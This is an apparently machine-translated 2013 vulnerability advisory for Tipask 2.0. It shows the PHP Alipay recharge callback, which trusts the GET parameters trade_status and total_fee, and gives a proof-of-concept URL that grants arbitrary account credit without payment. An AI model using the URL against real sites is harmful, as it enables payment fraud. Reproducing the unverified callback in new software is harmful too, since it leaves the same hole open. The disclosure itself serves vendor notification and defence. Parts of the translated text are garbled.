Tipask 2.0 any recharge vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201340681
Type myhack58
Reporter 猪头子@乌云
Modified 2013-09-23T00:00:00


Disclosure of status:

2013-06-24: positive contact vendors and wait for manufacturers to claim, details not open to the public

2013-09-22: the vendors have actively ignored vulnerabilities, the details disclosed to the public

Brief description:

The system does not check passed parameters validity

Detailed description:

function onaliapyback() {

if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {

$credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];

$this->credit($this-> user['uid' ], 0, $credit2, 0, "Alipay recharge");

$this->message( "recharge success" , "user/score" );

} else {

$this->message( "server busy, please try again later!" , 'STOP' );



Direct incoming total_fee both

Vulnerability to prove:

/? ebank/aliapyback. html&trade_status=TRADE_SUCCESS&total_fee=9 9

Repair solutions:

Wait ignore